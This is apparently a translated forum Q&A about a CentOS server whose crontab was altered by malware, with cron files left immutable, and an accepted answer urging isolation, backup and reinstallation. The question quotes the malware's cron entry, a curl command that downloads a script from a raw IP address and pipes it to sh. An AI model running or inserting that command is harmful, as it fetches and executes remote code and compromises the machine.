Por que meus arquivos de usuário crontab são imutáveis e não são executados mesmo depois de alterar o atributo para mutável?

Question

Por que meus arquivos de usuário crontab são imutáveis e não são executados mesmo depois de alterar o atributo para mutável?

#1 resposta do (3 votos)

0

Em um meio de suprimir um malware que criou uma entrada crontab abaixo, o II apresentou o uso do cron.deny

*/5 * * * * curl -fsSL http://62.109.20.220:38438/start.sh|sh

No entanto, todos os crontabs do usuário de repente pararam de acionar todos os trabalhos. Durante a solução de problemas, observei que todo o arquivo associado ao cron para todos os usuários não é editável.

ls -lht /etc/cron.denyus    -rw----er--- 1 root root 5 May 23 11:51 /etc/cron.deny

ls -lht /var/spool/cron/root
-rw-r--r-- 1 root root 62 Jun 16 08:10 /var/spool/cron/root

chmod 775 /etc/cron.deny
chmod: changing permissions of '/etc/cron.deny': Operation not permitted

chmod 775 /var/spool/cron/root
chmod: changing permissions of '/var/spool/cron/root': Operation not permitted

Mais tarde descobri que todos eles têm um atributo imutável.

lsattr /var/spool/cron/root
----i--------e- /var/spool/cron/root

lsattr /etc/cron.deny
----i--------e- /etc/cron.deny

Eu mudei o atributo imutável usando os comandos abaixo:

chattr -i /etc/cron.deny
chattr -i /var/spool/cron/root

No entanto, o cron não consegue acionar essas tarefas, por gentileza ajude a solucionar problemas. Obrigado

cron security malware linux centos

por Hynk 18.06.2017 / 10:01

1 resposta

Tags cron security malware linux centos

Obtendo o egrep -o output em uma linha cron.hourly "saiu com o código de retorno 1" sem saída para o arquivo de log

score 3 · Accepted Answer

Pare lá! Seu sistema foi infectado por um malware. Neste ponto, você não pode confiar no que seu sistema diz. O malware pode ter modificado o kernel. O que você vê é o que o malware quer que você veja. O sistema pode não se comportar de maneira consistente. Não espere que um arquivo seja modificado apenas porque o editor o salvou com sucesso, por exemplo.

Para reiterar, esqueça de entender as permissões, atributos imutáveis, etc. Tudo isso é para um sistema em funcionamento. Em um sistema comprometido, as coisas não se comportam de maneira consistente.

O que você precisa fazer agora é:

Coloque o servidor offline imediatamente . Pode estar infectando usuários com malware.
Faça um backup . Não apague nenhum dos seus backups existentes! Você precisa de um backup do sistema infectado por dois motivos: para rastrear de onde veio a infecção e para garantir que você tenha os dados mais recentes.
Descubra como você foi infectado . Isso é importante: se você restaurar o sistema com a mesma falha de segurança de antes, ele será infectado novamente.
Instale um novo sistema a partir do zero . Você não pode remover malware de forma confiável de um sistema. O malware tenta dificultar isso, e você nunca pode ter certeza de que o enganou.
Certifique-se de instalar as atualizações de segurança mais recentes de todos os softwares e de configurá-las com segurança, para que não sejam infectadas novamente.
Restaure seus dados . Certifique-se de restaurar apenas dados e não software vulnerável .

Veja também Como faço para lidar com um servidor comprometido?